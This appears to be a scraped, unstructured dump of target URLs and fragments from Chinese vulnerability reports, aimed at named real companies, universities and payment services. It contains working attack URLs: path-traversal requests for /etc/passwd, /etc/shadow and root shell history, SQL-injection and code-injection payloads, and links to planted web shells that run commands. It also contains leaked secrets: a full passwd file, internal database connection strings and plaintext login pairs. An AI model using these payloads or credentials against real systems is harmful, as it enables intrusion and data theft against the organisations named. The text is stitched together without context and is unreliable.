http://120.26.3.80:8000/test.php http://120.26.3.80:8000/t.php http://www.acfun.tv/member/#area=profile http://www.acfun.tv/member/signSubmit.aspx http://127.0.0.1/test/sign.html https://github.com/maqiong/admin_ext_git/blob/230f4595fb0fbeed126de4563fe75a097f906fa5/app/_function/functions.php https://github.com/maqiong/admin_ext_git/blob/230f4595fb0fbeed126de4563fe75a097f906fa5/app/_function/functions.php.bak www.rufengda.com http://www.rufengda.com http://www.rufengda.com/front/getCancelReason.do?orderNo=SL160106000028 http://b.agent.fang.com http://bbs.touna.cn/list-16/detail-122190-160-10.html/code https://github.com/pulchritude/emao.zt https://github.com/pulchritude/emao.ad http://sdkim.cmge.com/ http://cloud.ruijie.com.cn/rcs/login http://shop.ehuatai.com:7777/esale/login/rapidBaojiaAction-baojia.action http://shop.ehuatai.com:7777/isale/actions/logonAction-logon.action http://shop.ehuatai.com:7777/esale/login/rapidBaojiaAction-baojia.action http://fenxiao.lvmama.com/ http://fenxiao.lvmama.com/system/modifyUserMenu.jsp?user_id=1111,此user_id参数存在注入,DBA权限,包含20个数据库大量数据。经过搜索,发现此系统登陆账号存在于数据库SAAS14的USR_LOGIN表中,从而可获得任意一个账号登陆名和密码,公司员工账号为管理员,进入后均能进行分销商管理和订单管理等等敏感操作。 http://www22.53kf.com http://**.**.**.**/listgcss.asp?classid=24 http://mg.cmge.com/login.action http://oa.baison.com.cn:8080/ https://github.com/ray820328/game_admin_ray/blob/master/config/mail.properties http://119.29.35.245/admin/newIndex.do https://github.com/ray820328/game_admin_ray/blob/master/config/applicationContext.xml http://www.emaotai.cn:90/oAPI/API/eCenter/Member/GetMemberlist http://www.emaotai.cn:90/oAPI/API/eCenter/Member/GetMemberlist?khmc=%E4%B9%B0%E4%B9%90%E4%B9%90 http://www.emaotai.cn:90/oAPI/API/eCenter/Member/GetMemberlist?khmc=%E4%B9%B0%E4%B9%90%E4%B9%90 http://www.emaotai.cn/Storage/master/banner/20160106102147_8175.aspx http://219.223.252.7:8880/rsgl/recruit/logout.do http://old.cmge.com/WEB-INF/web.xml http://old.cmge.com/WEB-INF/classes/struts.xml http://old.cmge.com/WEB-INF/classes/applicationContext.xml http://old.cmge.com/WEB-INF/classes/hibernate.cfg.xml jdbc:mysql://192.168.1.151:3306/cmge?useUnicode=true&characterEncoding=UTF-8"/ http://www.acfun.tv/api/mail.aspx?name=newMail http://127.0.0.1/test/sign.html http://202.104.30.126/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID=.com/ http://api.airchina.com.cn http://api.airchina.com.cn:1790/ http://api.airchina.com.cn:1790/download.php?version=../../../../../../../../../../etc/passwd&file=privacy http://api.airchina.com.cn:1790/download.php?version=../../../../../../../usr/local/ctccap/ui/actions/delivery.inc&file=default https://github.com/chenghaiyang/vcredit/blob/67c7aa0a023805a985b7c7af6b9792ddef2359aa/ccl-branches-v2.0.1/src/main/java/com/vcredit/jdev/ccl/integration/weixin/WeiXinOAuthService.java http://www.kkcredit.cn/kakadai/index.html#fivepage https://github.com/chenghaiyang/vcredit/blob/67c7aa0a023805a985b7c7af6b9792ddef2359aa/ccl-branches-v2.0.1/src/main/resources/config/application.properties http://**.**.**.**/index001/shiyanshi/index.html http://www.acfun.tv/api/friend.aspx http://**.**.**.**:8080/jhsyB/login.do?method=weblogin http://**.**.**.**:8080 http://**.**.**.**/ http://17shop.lenovo.com.cn http://drp.emaotai.cn/ http://www.emaotai.cn:100/drp/ http://git.emaotai.cn/ http://hr.emaotai.cn/ cn:5000 http://116.31.92.73 http://**.**.**.**:4180/login/login.do http://58.61.161.99 http://**.**.**.**/ordermanager/clientlist.aspx http://**.**.**.**/sysmanager/userlist.aspx http://**.**.**.**/travel/taipei7p.asp?id=1457 http://marxism.pku.edu.cn/loginController.do?login http://183.136.184.77/rmp/home/nav.action#load/data-view www.jiankongbao.com jdbc:oracle:thin:@**.**.**.**:1521:odsdb http://119.147.144.221:8000/admin/login.action http://119.147.144.221/admin/adminLogin.action http://17shop.lenovo.com.cn http://www.sdcofco.com/ http://218.57.146.238:8090/qxgl/1.jsp http://clsy.cust.edu.cn/Admin/admin_users/admin_user.asp?action=adduser http://clsy.cust.edu.cn/Admin/admin_users/admin_user.asp?action=login http://www.chinaccm.com/SDHTML/SDICIndex.aspx?IndustryID=1461 http://**.**.**.**/yyoa/index.jsp使用致远A6的OA存在公用的注入漏洞 http://pm.chunshuitang.com/ http://www.oppodigital.com.tw/ https://idgame.boyaa.com/newsinfo.php?newsid=29 http://bill.bestpay.com.cn:37006 http://mail.bestpay.com.cn/ http://www.qoros.com/admincp/site/operator/news/list/get_news_detail.php?news_id=12 http://**.**.**.**/ewebeditor/admin/login.php root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin webadmin:x:500:500::/home/webadmin:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash http://**.**.**.**/sql/ http://www.einfo.net.cn/whut/newsmanage/showinDefault_index2.jsp?typeid=1 http://**.**.**.**:7001/zskwG/123.jsp http://member.shopin.net/findMpassword?mobile=138********&m_password=nothing http://note.youdao.com/group/ http://slide.toutiao.com/ http://www.ihaier.com/incubator/index/type/5/order/*/city/0/p/2 http://219.239.88.138/phpmyadmin http://219.239.88.96/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://219.239.88.96/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://219.239.88.62/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://mail.cmge.com/ http://**.**.**.**/,图中标识链接存在漏洞 http://m.cnmo.com/smart/index.php?c=AjaxDoc&m=HotInfos http://m.cnmo.com/smart/529709.html http://m.cnmo.com http://219.143.213.19/ http://219.143.213.19:8080/ http://172.24.2.33:9999 http://125.71.204.20:9999 http://221.179.193.208/ http://221.179.193.208/dsystem/scripts/jquery-validate/demo/captcha/.svn/entries http://221.179.193.208/dsystem/scripts/jquery-validate/demo/captcha/fonts/.svn/entries http://221.179.193.208/dsystem/scripts/jquery-validate/demo/captcha/images/.svn/entries http://221.179.193.208/dsystem/scripts/jquery-validate/lib/.svn/entries http://221.179.193.208/dsystem/scripts/jquery-validate/localization/.svn/entries http://221.179.193.208/dsystem/scripts/jquery-validate/.svn/entries http://221.179.193.208/dsystem/ http://221.179.193.208/dsystem/operation_category.txt http://221.179.193.208/dsystem/Graph/include/config.php http://gksx.free.ezvpn.cn:8080/yyoa/ http://gksx.free.ezvpn.cn:8080/yyoa/assess/js/initDataAssess.jsp http://gksx.free.ezvpn.cn:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://gksx.free.ezvpn.cn:8080/yyoa/createMysql.jsp http://ucenter.baomihua.com/install/uc.sql http://ucenter.baomihua.com/data/backup/backup_150915_ncPELi/150915_q8K5ST-1.sql http://bbs.baomihua.com/install/data/install.sql http://bbs.baomihua.com/adata/backup_150915_ncPELi/150915_5mHvuO-1.sql http://**.**.**.** http://**.**.**.** URL:sqlmap http://**.**.**.**/search.php/index/1?key=%25 http://yiyizuche.cn/1234/56/123456789/ http://**.**.**.**:8080 http://**.**.**.**:8080/changLang.action http://**.**.**.**:8080/voip/basemanager/dobakdata http://**.**.**.**:8080/voip/upload/test.jsp http://**.**.**.**/ http://**.**.**.**/index.php?func=appraise&action=detail&a_id=19 http://**.**.**.**/search?keywords=ad'&x=17&y=9 http://**.**.**.**/search/index http://**.**.**.**/search?keyword=jk&= http://**.**.**.**/index/search?keyword=ghj http://**.**.**.**/search?keywords=ppp http://**.**.**.**/search?keywords=asd http://**.**.**.**/search/index?keywords=hj http://**.**.**.**/index/search?keyword=fgh http://**.**.**.**/index/search?keyword=jkl http://**.**.**.**/search?keywords=pp http://**.**.**.**/search?keywords=asd http://**.**.**.**/search http://**.**.**.**/search?keywords=ad http://**.**.**.**/search?keywords=fghgf&x=8&y=12 http://**.**.**.**/search?keywords=ppp http://**.**.**.**/search?keywords=ad&x=17&y=9 http://**.**.**.**/search?keywords=ad&x=17&y=9 http://sdau.ecpay.cn发现个山东农业大学报名缴费系统,联行支持的,忽然想到,可以用find http://sdau.ecpay.cn/2.jsp jdbc:oracle:thin:@192.168.10.22:1521:cecpay jdbc:oracle:thin:@192.168.10.22:1521:cecpay jdbc:oracle:thin:@192.168.10.22:1521:cecpay http://mss.cosmo-lady.com/mss/logonNewAction.do?method=logon http://mss.cosmo-lady.com/mss/logonNewAction.do?method=logon http://120.197.42.190/ http://120.197.42.190/zecmd/zecmd.jsp http://218.5.65.215:8080/yyoa/ http://218.5.65.215:8080/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://218.5.65.215:8080/yyoa/assess/js/initDataAssess.jsp http://218.5.65.215:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1 https://github.com/Javared/ixhong/blob/6b2b25ab32426cffddfc282060702e08d96eb374/ixhong-common/src/main/java/com/ixhong/common/mail/EmailSenderClient.java http://admin.xuehaodai.com/operations_log/audit_list.jhtml http://172.16.10.15/ci/asynchPeople/ http://172.16.10.39:8080/asynchPeople/ http://172.16.10.108:8080/ http://192.168.65.3/dashboard/db/basic-info http://192.168.65.27/ http://192.168.65.68/ http://192.168.65.93:8080/ui/#/apps https://user.ecpay.cn/ecm/test.Index.html https://**.**.**.**/tonny-zhang/mailer/blob/05b9117644aa2ead5806abaf1071e148282affdc/lib/mail/conf.php http://club.jr.jd.com/topic/602886 http://**.**.**.**/wis/ http://**.**.**.**/wis/jsp/DataQuery/queryTreeItem.dhcc?treeWhere=where%20LEVEL_1=!GTS!%20and%20LEVEL_2=!By%20Type!%20and%20LEVEL_3=!Notices!&catalog=%3EGTS%3EBy%20Type%3ENotices&flag=5 http://user.mapi.jiashuangkuaizi.com/UAddress/modify http://**.**.**.**/pmd/ http://t.5i5j.com/webapp/api/community/search.json?cityid=9&name=%E5%9B%9B%E5%B9%B3%E8%B7%AF1230%E5%8F%B7&_=1452149152891&__ajax_random__=0.08151449239812791&__jsonpcallback=xiaoqu_request1.render http://**.**.**/login.html https://ipcrs.pbccrc.org.cn/uddiexplorer/SetupUDDIExplorer.jsp http://21.10.6.13:7001 http://21.10.6.11:7001 http://21.10.6.14:7001 http://21.10.6.12:7001 http://21.10.6.65:7003 http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**:7001 http://coupon.ele.me http://203.90.140.115/b2b/web/two/indexinfoAction.do?actionType=showCgxjDetail&xjbm=2016010003 https://c.163.com/dashboard#/m/repo/create/ http://mirrors.163.com/ubuntu/ http://**.**.**.**/Default.aspx http://**.**.**.**/js/main.asp?lh=1 http://tui.boyaa.com/index.php http://tui.boyaa.com/?controller=Account&action=step3 http://**.**.**.**/linghangvip/msnol/detail.asp?id=4729 http://**.**.**.**/staticindex.html http://120.197.42.190/solr http://124.193.66.106 http://202.108.145.94/redmine/ http://202.108.145.128/redmine/ http://**.**.**.**:7002/logonAction.do http://**.**.**.**/index.php/module/action/param1/$%7B@eval%28$_POST[c]%29%7D http://scrm.vivo.com.cn:3000 http://scrm.vivo.com.cn:30015/ http://www.elifepay.com.cn http://www.elifepay.com.cn/usercenter/getBackUserPwdByPhone.action www.elifepay.com.cn url:sqlmap http://**.**.**.**/Allinfo.aspx?SA=--%c8%ab%b2%bf--&FN=%* https://222.198.128.247:8880 http://**.**.**.**/03/chat/messagelist.asp?id= http://**.**.**.**/ http://**.**.**.**/download.php?id=17 http://**.**.**.**/goods/search.html?gname= http://**.**.**.**/ckfinder/ckfinder.html http://www.scrcoabj.com http://jj.cust.edu.cnsj-every.aspid=6 http://jj.cust.edu.cn/jj-every.asp?id=14 http://jj.cust.edu.cn/eWebEditor/admin_login.asp http://jj.cust.edu.cn/system/login.asp http://jj.cust.edu.cn/ewebeditor/ewebeditor.asp?id=content&style=standard http://jj.cust.edu.cn/eWebEditor/upload.asp http://jd.cust.edu.cn/teacher_show.asp?id=33 http://jd.cust.edu.cn/admin/admin_login.asp http://jd.cust.edu.cn/editor/fckeditor/editor/fckdebug.html http://jd.cust.edu.cn/editor/fckeditor/editor/fckeditor.html http://oa.tianya.cn http://wooyun.org/bugs/wooyun-2010-0136818 http://oa.tianya.cn/pweb/careerapply/HrmCareerApplyPerEdit.jsp?id=1 http://**.**.**.**:8088/Login.aspx http://**.**.**.**/mcdm/welcome/home.seam http://998.com/Account/Sign这个地方登录位置,有验证码但是可绕过,用户名密码明文传输 http://robotim.vmall.com/live800/faq.jsp?companyId=8922 http://cos.sto.cn/web/careerapply/HrmCareerApplyPerEdit.jsp?id=1 http://wooyun.org/bugs/wooyun-2010-0136818 https://github.com/luningzju/sgccwooyunalert/blob/44497baa7f7f105f1e7b939864aeaba40561b0a2/sgccwooyunalert.py http://oa.998.com/web/careerapply/HrmCareerApplyPerEdit.jsp?id=1 url:sqlmap http://**.**.**.**/c/corp_news_details.php?itemid=457&page=01 http://**.**.**.** http://**.**.**.** http://**.**.**.**/main/wdb2/go.php?xmlid=28780&urlxmlid=28781 http://seba.cqu.edu.cn/eba/index.eda?fid=8&method=colContent http://**.**.**.**/index http://**.**.**.**:7001 http://**.**.**.**:7001 http://www.darryring.com/jewelry?style=duijie&page=1&title=印记 http://www.vmovier.com/user/forgetpwd http://www.yingdegas.com/s/index.php http://ehome.zte.com.cn/ http://**.**.**.**//News/NewsSearch.aspx?Search=aaa http://**.**.**.**/bugs/wooyun-2010-0126899 e905:c775:33b9%10 http://**.**.**.** http://radar.nju.edu.cn/wwwww/login.asp http://sc.nju.edu.cn/UploadFiles/20161811935990.aspx http://radar.nju.edu.cn/service.asp?id=10 http://**.**.**.**/user/job_content.php?market_id=144 http://www.chinaccm.com/WebInfoList.aspx?Column=212404&end_date=&keyword=&PageIndex=7&start_date= http://**.**.**.**/Admin/Login.aspx http://**.**.**.**/pcStore/findByOrg?keyWords= http://27.17.7.236 http://**.**.**.**:8001/css/self/searchCertApply!searchCert.do http://www.jt510.cn/portal/index.action http://14.17.69.188/admin http://14.17.69.188/skyservice/pic?/etc/hosts http://14.17.69.188/skyservice/pic?/etc/shadow http://14.17.69.188/skyservice/pic?/root/.bash_history http://14.17.69.188/skyservice/pic?/usr/local/jboss/server/default/deploy/mysql-ds.xml http://manage.ezucoo.com/erc/login.action http://**.**.**.**:7001/存在“Java http://**.**.**.**/download/AppStore/0fe7858b2e6747082747b881b432888919942e6c2/com.xiaomi.market_R.1.4.5.apk http://**.**.**.**/php/news_detail.php?id=94 http://suyun.guest.daojia.com/api/guest/rechargeCheak http://suyun.guest.daojia.com/api/guest/rechargeact http://suyun.guest.daojia.com http://**.**.**.**/customer/vacon1/example_detail.asp?id=2014042813351300001 https://m.wangyin.com/ryze/transferRecord https://m.wangyin.com/ryze/transferRecord https://m.wangyin.com/ryze/transferStatus http://img20.360buyimg.com/payment/jfs/t1237/176/1060321396/24129/3671b827/557062baN2458bbda.png","inUserId":"1200006529071","inCustomerId":"360000000215219468 http://106.39.244.41 http://106.39.244.41:80/application/configs/application.ini http://**.**.**.** http://user.ftchinese.com/login http://**.**.**.**/brands/oe/category?cid=287 http://gix5-stag.glodon.com/index.jsp http://gix5-stag.glodon.com/web-console控制台未授权访问,所以我们可以直接getshell http://im.changyou.com/live800/downlog.jsp?path=/&fileName=/etc/passwd http://im.changyou.com/live800/downlog.jsp?path=/&fileName=/etc/shadow http://www.izuche.com/portalcarbooking/othern.aspx?CarTypeId=1&CityID=1¤tCarTypeName=%B4%F3%D6??%EF%CA?%AF%B5%B2&GetCarAddress=e&GetCarCity_txt=e&GetCarDate=e&GetCarTime=&IsGetCarVisit=true&IsReturnCarVisit=false&ReturnCarAddress=e&ReturnCarCity=1&ReturnCarCity_txt=e&ReturnCarDate=e&ReturnCarStore=10100821&ReturnCarTime=&StoreID=1&_=1451891611039 http://**.**.**.**/ http://**.**.**.**/about2.php?id=49 http://202.102.90.245/ http://**.**.**.**/contents/oldnews/news_view.asp?nid=80 http://**.**.**.**/news/main2_v.php?pid=682 http://tfzx.pku.edu.cn/admin/admin_index.asp http://**.**.**.**/prosemteacher.aspx?tid=2014091811471700001 http://**.**.**.**/News/List_News.aspx?SystemName=SchoolNews*&TypeID=3 http://**.**.**.**/products/products_list.php?cid=17 http://**.**.**.**/.svn/entries http://**.**.**.**/uc_server/.svn/entries http://**.**.**.**/WebMaster/?section=44 http://www.izuche.com/getpassword2.aspx?Mobile=13333333333 http://www.zyql.cn/ http://www.998.com/UniteLogin/UniteLogin?_t=t这个接口是格林豪泰主站接口,登录位置存在验证码,但是测试发现可以绕过的 http://bcscdn.baidu.com/ http://wap.izuche.com/FindPass.aspx http://**.**.**.**/e_news3.php?uid=468 http://**.**.**.**/e_news3.php?uid=468%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT%280x7176627a71,user%28%29%29,NULL,NULL-- http://**.**.**.**/active_detail.php?classid=4&id=73* http://web.ccniit.com/WebPage/bdcb77eb-f7fd-4591-ad1a-f5ef5e7b2214.asp http://**.**.**.**)在登录部分的代码存在2处注入。能获取数据库、表信息。 http://**.**.**.**/console/judgeUserE**.**.**.**?method=judgeUserExist&username=admin http://**.**.**.**/console/judgeUserE**.**.**.**?method=judgeUserExist&username=1 http://**.**.**.**:8001/phrs/fileupload.jsp?proid=2b328d0703a74c26b027b1375aa2603f http://search.jr.jd.com/gs/search?q http://**.**.**.**/en/newsroom_event_details.php?id=3636 http://demo.phpok.com/admin.php www.5***** www.523***** www.zj***** www.***** www.xmh***** www.ycy***** www.***** www.bik***** http://t.5i5j.com/webapp/api/community/searchLocate.json?__ajax_random__=0.9211878408677876&name=%E5%92%8C%E6%96%B0%E5%8D%97%E8%8B%91&_=1452230352883&__jsonpcallback=map_addressSearch.render http://data.quanshang.hexun.com/ http://data.quanshang.hexun.com/yyfb/yywdByregion.aspx?region=307000000 http://share.gome.com.cn:8080/ http://share.gome.com.cn:8080/payment/f.jsp www.cofcohg.com/?m=Index&a=about_show&id=11 http://**.**.**.**/data.mdb http://www.x-lab.tsinghua.edu.cn:80/ www.x-lab.tsinghua.edu.cn http://**.**.**.**/ArticlesView.asp?bid=35&sid=0&id=421 http://**.**.**.**/articles.asp?bid=2 http://**.**.**.**/gsjj.asp?id=90&leixing=%E4%B8%AD%E5%BF%83%E7%AE%80%E4%BB%8B http://www.hillstonenet.com.cn:80/ www.hillstonenet.com.cn http://**.**.**.**/index.php?func=schedule&action=detail&sdc_id=2&sd_no=SR105000003 jdbc:oracle:thin:@**.**.**.**:1521:hbjdsdb jdbc:oracle:thin:@**.**.**.**:1521:hbjdsdb jdbc:oracle:thin:@**.**.**.**:1521:hbjdsdb jdbc:oracle:thin:@**.**.**.**:1521:hbjdsdb jdbc:oracle:thin:@**.**.**.**:1521:hbjdsdb jdbc:oracle:thin:@**.**.**.**:1521:hbjdsdb jdbc:oracle:thin:@**.**.**.**:1521:hbjdsdb jdbc:oracle:thin:@**.**.**.**:1521:hbjdsdb jdbc:oracle:thin:@**.**.**.**:1521:hbjdsdb http://106.3.36.125/dbws/home/login/login.html http://106.3.36.125/dbws/Home/DiseaseManage/diseaseinfo?dis_id=2048&dep_id=7&show_id=1 http://**.**.**.**/new.tar http://117.122.196.249/ http://117.122.196.247/ http://117.122.196.249/uddi/_uddi.jsp http://117.122.196.247/bea_wls_internal/_uddi.jsp http://**.**.**.**/Web/RentalNoticeDetail.aspxCountryCode=AU&CountryName=Australia http://**.**.**.**/employee/module/e0016/adm/addchgcontent.php?action=add&intTablePK= http://**.**.**.**/WebResource.axd?d=9GoCxXq47LP73lPhVAcBIA2 http://x86.sugon.com/goto_login.action查询系统 http://**.**.**.**/Index/news/show_list/catid/?catid=162&p=1 http://**.**.**.**/patent/show_list.html?&shop=1813 http://**.**.**.**/Good.aspx?GoodID=1004 http://**.**.**.**/Good.aspx?GoodID=1004 http://www.cang.com/ http://**.**.**.**/ncu7020/rdnewsletter/cover.php?action=show&cid=40&id=19 http://**.**.**.**/ncu7020/rdnewsletter/cover.php?action=show&cid=40&id=19%20and%20if%28ascii%28mid%28user%28%29%20from%201%20for%201%29%29=82,sleep%281%29,1%29 http://58.213.104.242:801 http://58.213.104.242:801/debug.txt http://58.213.104.242:801/ExcelFiles/ http://58.213.104.242:801/down/xml/ http://122.224.156.194:9090/daikuantouzi?rateEnd=10&rateBegin=0&istate=10&pageIndex=11 http://www.ineigo.com http://tc.homelink.com.cn/Academy/AcademyCertificateCourseMaintai03.aspx http://119.254.70.180/test.php http://hivesec.net/web-security/%E5%85%B3%E4%BA%8Eblind-xxe.html http://mys8.super8.com.cn:81/Login.aspx http://mys8.super8.com.cn:81/pages/bn/storesatisfaction/bn_storesatisfactionmanage.aspx http://**.**.**.**/training/ClassDetail.asp?CGID=936&CID=CLS201503191105018HF http://106.3.36.125:82/ http://**.**.**.**/search/data.mdb http://**.**.**.**/kzjz/ttpp/vote.asp?id=32 http://**.**.**.**//kzjz/admin/Login.asp http://**.**.**.**/admin/admin.php?P=Product http://**.**.**.**/index2.php?content=portfolio&uid=doris&msid=5447 http://sica.wh.sdu.edu.cn/admin http://58.213.104.242:802 http://58.213.104.242:802/APIService.asmx http://tempuri.org/Login soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema soap:Body http://tempuri.org/ soap:Body soap:Envelope http://jw.jlxy.nju.edu.cn/manage/login.aspx http://test.iosask.cn/dgws/ http://test.iosask.cn/dgws/home/mycure/patientinfo?aid=734 http://**.**.**.**:10000 http://doctor.langma.cn/home/index http://**.**.**.** coding:utf-8 http://123.56.113.223:8081/Handler/Imple.ashx?pageIndex=1&type=Imple&Id=134 http://**.**.**.**/news_show.asp?id=63 http://**.**.**.**/viewSingerHomepage.html?singerId=66243&loc=P21Z1Y1L2N1&locno=1 http://www.youjuu.com/about.html http://**.**.**.**/webserver/Ajax_homecenter.aspx?bproname=1callback=jQuery183031502415402792394_1452160270487&Type=gethouselist&_=1452160271484 http://www.legendsec.com/ http://t999.ensite.b2b.cn/admin/index.htm http://**.**.**.**/style_info.asp?newid=22 http://**.**.**.**/detail.php?articleId=50101 http://**.**.**.**/news2.php?fid=9&pg_no=789 http://**.**.**.**/2013/epaper/4c.php?id=54&aid=500 http://**.**.**.**/main/focus.php?aid=16 http://easyscholar.ruc.edu.cn/search.php?name=e IndexService.asmx/Login http://maomi.emao.com/ http://**.**.**.**/~cmu4c/2010/epaper/detail_2.php?id=16&kid=4 http://**.**.**.**:7001/equerying/login/logon.jsp http://**.**.**.**:7001/存在“Java http://logic.nju.edu.cn/show.php?catid=26&id=73 http://219.219.114.121/show.php?catid=36&id=11 http://116.199.115.135/jqweix/ http://116.199.115.135/weix/ http://116.199.115.135/zjsmweix/ http://114.251.197.194/ http://114.251.197.194/Login.aspx http://114.251.197.194/Login.aspx http://sqlmap.org http://114.251.197.194:80/Login.aspx http://**.**.**.**/ https://**.**.**.**/ http://boss.htd.cn/ http://www.mobee.tv/tvguide.htm的时候得到一个地址 http://admin-itvg.skyworthbox.com http://admin-itvg.skyworthbox.com/admin/adminLogin.action http://www.hisunsray.com/news/conews_view.asp?fileid=9863663&typeId=2550 http://**.**.**.**/keshi.php?ks=%E5%8A%9E%E5%85%AC%E5%AE%A4 http://42.62.53.93/is/cmd.jsp?pwd=023&cmd=uname http://**.**.**.**:8080/view.asp?id=209 http://mba.tju.edu.cn/ C18D7B29143B2AEDFFE04A92F17784FC:FG=1 http://gugong.228.com.cn/ https://**.**.**.**/ http://**.**.**.**:8080/web/ConfigDivServ.jsp?op=showModify&uid=%bf http://**.**.**.**:8080/web/web_login_detail.jsp http://**.**.**.**:8080//web/log_bus_list.jsp?userno=-1 http://yingzhang.izuche.com:8087/CustomersJson.asmx/GetVerifyCheckCode com:8087 http://huifen.htd.cn http://**.**.**.** http://**.**.**.**/govop/Detailed.aspx?itemid=7512 www.sugon.com http://admin.heitao.com http://stat.wanglibao.com:10000/applog/push.php com:10000 http://hy.ceair.com/web.rar http://**.**.**.**/default.asp http://**.**.**.**/list_crt.asp?id=15 http://oa.sugon.com/home/Produce/WeboaConfig.nsf/HomeForm?openform&login http://info.315.com.cn/ex/ex_talk_list.jsp?idn=-1 http://www.changhong.com.cn/ http://www.changhong.com.cn/wap/ http://www.changhong.com.cn/ProductCtl-list.do?ptype=2 http://**.**.**.** http://**.**.**.**/Company.asp?id=7 http://**.**.**.**/pzhi.asp?id=48 http://**.**.**.**/Service.asp?id=38 http://**.**.**.**/Marketing.asp?id=13 http://**.**.**.**/Job.asp?id=20 http://**.**.**.**/Contact.asp?id=25 http://**.**.**.**/Company.asp?id=7 http://passport.ccidnet.com/passport/passport?accountName=&action=17&email=sample%40email.tst&oprate=chkEmail http://**.**.**.**/c.html http://**.**.**.**/infolist.asp?big=%B2%BF%C3%C5%B8%C5%BF%F6 http://27.115.81.152:8080/ http://www.daoyoudao.com/dyd/city_getCitys.do?provincename=%25E6%25BE%25B3%25E9%2597%25A8%25E5%25B8%2582 http://static.daoyoudao.com http://**.**.**.**:9080/grm/ecosphere/portal/index.html http://**.**.**.**/api/front/news/listfirst?classId=83 http://m.e-bridge.com.cn/login.jsp http://www.gzxijiu.cn/phpmyadmin http://**.**.**.**/yyoa/ http://oa.moonbasa.com/seeyon/index.jsp致远A8的OA存在后门的哦 http://oa.moonbasa.com/seeyon/logs/login.log url:http://bzh.cnooc.com.cn/ http://bzh.cnooc.com.cn//Esst.Web.Login/CheckLoginState.aspx?User=admin*&Pwd=admin http://**.**.**.**:7001/存在“Java http://m.hc360.com/login.html这个接口是手机端登录接口,可以看到登录位置有验证码但是验证码可以绕过的 user:yzjtj,pass:yzjtj359 user:lygjtj,pass:lygjtj361 user:tzjtj,pass:tzjtj362 user:sqjtj,pass:sqjtj363 user:ntjtj,pass:ntjtj358 http://jf.crcxf.com:8001/Service/EmployDetaile.aspx?Id= http://bcs.baidu.com http://gs1.dlut.edu.cn/Supervisor/Front/dsxx/new/Default.aspx?WebPageName=zhuchungan&SpecialityID= http://xiaoshe.cnhubei.com/login.asp http://xiaoshe.cnhubei.com/attachments/month_1601/5.asp http://**.**.**.**/includes http://**.**.**.**/includes/payments/alipay/lib/logs/2015-12-15.log http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/js/jquery-1.4.2.min.js/%20\0.php http://**.**.**.**/js/jquery-1.4.2.min.js/a.php http://**.**.**.**/jcydhd/jcydhd.rar http://**.**.**.**/default.rar http://**.**.**.**/zzb/Detail.asp?bigId=1 http://**.**.**.**/zzb/Detail.asp?bigId=3 http://**.**.**.**/zzb/Detail.asp?bigId=3 http://**.**.**.**/ http://**.**.**.**/index.do http://**.**.**.**/crn-webapp/zpykpub/left.jsp?mgzno=214 http://big5.ftchinese.com/这个是ft中文网的一个分站,登录的地方没有验证码限制也没有其他登录限制 http://ia-lab.dlut.edu.cn/cn/detail.asp?id=38 http://mpa.dlut.edu.cn/TeacherDetail.aspx?tid=11 http://**.**.**.**/bbs/uc_server/ http://sbs.m.sogou.com index.php/site/login http://www.junlebaoruye.com/ http://www.jlbry.com/ http://mail.jlbry.com/ http://lom.zqgame.com/getGiftCode?callback=jQuery1720561785590602085_1452288272132&type=-1 url:sqlmap http://**.**.**.**:8080/jmw/njjmw/info/policydetail;jsessionid=9A8EB815F87A86709131C532BF73114C?id=20150520092051443* http://td2.zqgame.com/interaction/list/page/1/6/type/flash*.html http://**.**.**.**/login http://202.108.145.195/ http://202.108.145.195/login/ http://202.108.145.195/backend/ http://lib.wap.zol.com.cn/bbs/my/myCollection.php?userid=itwgiv&vs=and412&imei=A0000000000000 http://mba.bus.sysu.edu.cn/site/project/3/16.html?first_char=W&first_char=L&job_title=2 http://school.51taoshi.com/study/index/classRoomForAnquan.action?search.field02=-1 http://**.**.**.**/ http://**.**.**.**/danpian/danpian.aspx?id=11328 